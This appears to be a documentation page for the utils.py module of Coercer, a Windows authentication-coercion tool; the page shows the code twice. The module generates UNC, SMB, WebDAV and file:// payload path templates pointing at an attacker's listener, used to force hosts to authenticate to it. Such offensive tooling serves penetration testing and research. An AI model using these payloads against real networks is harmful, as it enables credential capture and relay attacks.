coercer.core.utils
1#!/usr/bin/env python3 2# -*- coding: utf-8 -*- 3# File name : utils.py 4# Author : Podalirius (@podalirius_) 5# Date created : 15 Sep 2022 6 7 8import random 9import jinja2 10 11 12def gen_random_name(length=8): 13 alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" 14 name = "" 15 for k in range(length): 16 name += random.choice(alphabet) 17 return name 18 19 20def generate_exploit_templates(desired_auth_type=None): 21 add_uncommon_tests = False 22 23 templates = [ 24 # Only ip 25 ("smb", '{{listener}}\x00'), 26 # SMB 27 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 28 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 29 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 30 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\\x00'), 31 ("smb", '\\\\{{listener}}{{smb_listen_port}}\x00'), 32 # SMB path with ? 33 ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 34 ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 35 ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 36 ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\\x00'), 37 ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\x00'), 38 # SMB path with . 39 ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 40 ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 41 ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 42 ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\\x00'), 43 ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\x00'), 44 # UNC path with ? 45 ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 46 ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 47 ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 48 ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'), 49 ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\x00'), 50 # UNC path with ?? 51 ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 52 ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa\x00'), 53 ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 54 ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 55 ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'), 56 ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\x00'), 57 # UNC path with . 58 ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 59 ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 60 ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 61 ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'), 62 ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\x00'), 63 # HTTP 64 ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\File.txt\x00'), 65 ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\\x00'), 66 ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\x00'), 67 ("http", '\\\\{{listener}}{{http_listen_port}}\\\x00'), 68 ("http", '\\\\{{listener}}{{http_listen_port}}\x00') 69 ] 70 71 if add_uncommon_tests: 72 templates += [ 73 74 # HTTP 75 ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\\File.txt\x00'), 76 ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\\\x00'), 77 ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\x00'), 78 ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\\x00'), 79 ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\x00'), 80 ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\\x00'), 81 ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\x00'), 82 83 ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path/File.txt\x00'), 84 ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path/\x00'), 85 ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path\x00'), 86 ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/\x00'), 87 ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}\x00'), 88 ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/\x00'), 89 ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}\x00'), 90 91 ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'), 92 ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\\\x00'), 93 ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\x00'), 94 ("smb", '\\UNC\\{{listener}}\\\x00'), 95 ("smb", '\\UNC\\{{listener}}\x00'), 96 97 ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'), 98 ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\\\x00'), 99 ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\x00'), 100 ("smb", 'UNC\\{{listener}}\\\x00'), 101 ("smb", 'UNC\\{{listener}}\x00'), 102 103 ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'), 104 ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\\\x00'), 105 ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\x00'), 106 ("smb", 'UNC:\\{{listener}}\\\x00'), 107 ("smb", 'UNC:\\{{listener}}\x00'), 108 109 ("http", 'http://{{listener}}/EndpointName/File.txt\x00'), 110 ("http", 'http://{{listener}}/EndpointName/\x00'), 111 ("http", 'http://{{listener}}/\x00'), 112 ("http", 'http://{{listener}}\x00'), 113 114 ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\\File.txt\x00'), 115 ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\\\x00'), 116 ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\x00'), 117 ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\\x00'), 118 ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\x00'), 119 ("http", 'file://\\\\{{listener}}\\EndpointName\\\x00'), 120 ("http", 'file://\\\\{{listener}}\\EndpointName\x00'), 121 ] 122 123 paths = [] 124 for auth_type, exploit_path in templates: 125 if desired_auth_type is not None: 126 if auth_type == desired_auth_type: 127 paths.append((auth_type, exploit_path)) 128 else: 129 paths.append((auth_type, exploit_path)) 130 return paths 131 132 133def generate_exploit_path_from_template(template, listener, http_listen_port=80, smb_listen_port=445): 134 # Declaring template functions 135 rnd = gen_random_name 136 137 if smb_listen_port is not None and smb_listen_port != 445: 138 smb_listen_port = "@%d" % smb_listen_port 139 else: 140 smb_listen_port = "" 141 142 if http_listen_port is not None: 143 http_listen_port = "@%d" % http_listen_port 144 else: 145 http_listen_port = "@80" 146 147 # Rendering template 148 exploit_path = jinja2.Template(template).render( 149 listener=listener, 150 rnd=rnd, 151 http_listen_port=http_listen_port, 152 smb_listen_port=smb_listen_port 153 ) 154 return exploit_path
def
gen_random_name(length=8):
def
generate_exploit_templates(desired_auth_type=None):
21def generate_exploit_templates(desired_auth_type=None): 22 add_uncommon_tests = False 23 24 templates = [ 25 # Only ip 26 ("smb", '{{listener}}\x00'), 27 # SMB 28 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 29 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 30 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 31 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\\x00'), 32 ("smb", '\\\\{{listener}}{{smb_listen_port}}\x00'), 33 # SMB path with ? 34 ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 35 ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 36 ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 37 ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\\x00'), 38 ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\x00'), 39 # SMB path with . 40 ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 41 ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 42 ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 43 ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\\x00'), 44 ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\x00'), 45 # UNC path with ? 46 ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 47 ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 48 ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 49 ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'), 50 ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\x00'), 51 # UNC path with ?? 52 ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 53 ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa\x00'), 54 ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 55 ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 56 ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'), 57 ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\x00'), 58 # UNC path with . 59 ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 60 ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 61 ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 62 ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'), 63 ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\x00'), 64 # HTTP 65 ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\File.txt\x00'), 66 ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\\x00'), 67 ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\x00'), 68 ("http", '\\\\{{listener}}{{http_listen_port}}\\\x00'), 69 ("http", '\\\\{{listener}}{{http_listen_port}}\x00') 70 ] 71 72 if add_uncommon_tests: 73 templates += [ 74 75 # HTTP 76 ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\\File.txt\x00'), 77 ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\\\x00'), 78 ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\x00'), 79 ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\\x00'), 80 ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\x00'), 81 ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\\x00'), 82 ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\x00'), 83 84 ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path/File.txt\x00'), 85 ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path/\x00'), 86 ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path\x00'), 87 ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/\x00'), 88 ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}\x00'), 89 ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/\x00'), 90 ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}\x00'), 91 92 ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'), 93 ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\\\x00'), 94 ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\x00'), 95 ("smb", '\\UNC\\{{listener}}\\\x00'), 96 ("smb", '\\UNC\\{{listener}}\x00'), 97 98 ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'), 99 ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\\\x00'), 100 ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\x00'), 101 ("smb", 'UNC\\{{listener}}\\\x00'), 102 ("smb", 'UNC\\{{listener}}\x00'), 103 104 ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'), 105 ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\\\x00'), 106 ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\x00'), 107 ("smb", 'UNC:\\{{listener}}\\\x00'), 108 ("smb", 'UNC:\\{{listener}}\x00'), 109 110 ("http", 'http://{{listener}}/EndpointName/File.txt\x00'), 111 ("http", 'http://{{listener}}/EndpointName/\x00'), 112 ("http", 'http://{{listener}}/\x00'), 113 ("http", 'http://{{listener}}\x00'), 114 115 ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\\File.txt\x00'), 116 ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\\\x00'), 117 ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\x00'), 118 ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\\x00'), 119 ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\x00'), 120 ("http", 'file://\\\\{{listener}}\\EndpointName\\\x00'), 121 ("http", 'file://\\\\{{listener}}\\EndpointName\x00'), 122 ] 123 124 paths = [] 125 for auth_type, exploit_path in templates: 126 if desired_auth_type is not None: 127 if auth_type == desired_auth_type: 128 paths.append((auth_type, exploit_path)) 129 else: 130 paths.append((auth_type, exploit_path)) 131 return paths
def
generate_exploit_path_from_template(template, listener, http_listen_port=80, smb_listen_port=445):
134def generate_exploit_path_from_template(template, listener, http_listen_port=80, smb_listen_port=445): 135 # Declaring template functions 136 rnd = gen_random_name 137 138 if smb_listen_port is not None and smb_listen_port != 445: 139 smb_listen_port = "@%d" % smb_listen_port 140 else: 141 smb_listen_port = "" 142 143 if http_listen_port is not None: 144 http_listen_port = "@%d" % http_listen_port 145 else: 146 http_listen_port = "@80" 147 148 # Rendering template 149 exploit_path = jinja2.Template(template).render( 150 listener=listener, 151 rnd=rnd, 152 http_listen_port=http_listen_port, 153 smb_listen_port=smb_listen_port 154 ) 155 return exploit_path